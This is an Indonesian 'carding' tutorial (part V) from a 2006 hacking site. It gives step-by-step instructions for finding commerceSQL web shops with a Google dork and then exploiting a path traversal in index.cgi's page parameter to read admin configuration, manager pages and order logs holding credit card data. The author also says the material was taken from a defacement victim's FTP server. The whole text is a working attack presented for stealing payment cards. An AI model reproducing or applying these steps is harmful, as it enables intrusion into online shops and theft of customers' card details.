« Back ::

« www.spyrozone.net »

 

[151]. Tutorial Carding (Bagian V)

    

  

------------------------------------------------------

Author  : SPYRO KiD

Contact : admin[~@~]spyrozone.net » http://spyrozone.net

CopyLEFT (c) 2006 www.spyrozone.net All Rights Reserved

» 28/09/2006  03:40:15 WIB

------------------------------------------------------

 

--------------------------------------

Tutorial ini spyro dapatkan dari suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul "Mengapa aku mendeface profil FS dan website Fun2Holic" (19 september 2006) di halaman Cerita Hari iNi.

--------------------------------------

 

Materi ke-5 : commerceSQL
1. Cari target dahulu Website commerceSQL di google.com, dengan keyword:

   allinurl:/commercesql/
2. Misalkan kita mendapat target dg url

   http://www.contoh.com/commercesql/blablabla , maka :
3. Ganti url tsb menjadi

   -> www.contoh.com/cgi-bin/commercesql/index.cgi?page=<injection page>
4. Contoh untuk melihat admin config

   -> www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
5. Contoh untuk melihat admin manager

   http://www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
6. Sedangkan utk melihat file log/ccnya ->   http://www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
7. Materi ke-5 Selesai.

  

 

/* ------------------------------|EOF|------------------------------ */

 

   « Back

« www.spyrozone.net »